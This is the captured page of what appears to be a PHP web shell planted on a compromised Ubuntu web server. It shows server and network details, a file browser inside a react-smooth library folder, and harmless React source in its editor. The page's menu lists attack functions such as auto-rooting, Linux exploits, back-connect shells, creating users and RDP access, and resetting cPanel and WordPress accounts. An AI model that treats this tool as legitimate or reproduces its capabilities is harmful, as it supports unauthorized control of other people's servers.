Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
react-smooth /
es6 /
[ HOME SHELL ]
Name
Size
Permission
Action
Animate.js
18.05
KB
-rw-r--r--
AnimateGroup.js
1022
B
-rw-r--r--
AnimateGroupChild.js
8.93
KB
-rw-r--r--
AnimateManager.js
2.7
KB
-rw-r--r--
configUpdate.js
7.51
KB
-rw-r--r--
easing.js
7.27
KB
-rw-r--r--
index.js
207
B
-rw-r--r--
setRafTimeout.js
583
B
-rw-r--r--
util.js
4.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AnimateGroup.js
import React, { Children } from 'react'; import { TransitionGroup } from 'react-transition-group'; import PropTypes from 'prop-types'; import AnimateGroupChild from './AnimateGroupChild'; function AnimateGroup(props) { var component = props.component, children = props.children, appear = props.appear, enter = props.enter, leave = props.leave; return /*#__PURE__*/React.createElement(TransitionGroup, { component: component }, Children.map(children, function (child, index) { return /*#__PURE__*/React.createElement(AnimateGroupChild, { appearOptions: appear, enterOptions: enter, leaveOptions: leave, key: "child-".concat(index) // eslint-disable-line }, child); })); } AnimateGroup.propTypes = { appear: PropTypes.object, enter: PropTypes.object, leave: PropTypes.object, children: PropTypes.oneOfType([PropTypes.array, PropTypes.element]), component: PropTypes.any }; AnimateGroup.defaultProps = { component: 'span' }; export default AnimateGroup;
Close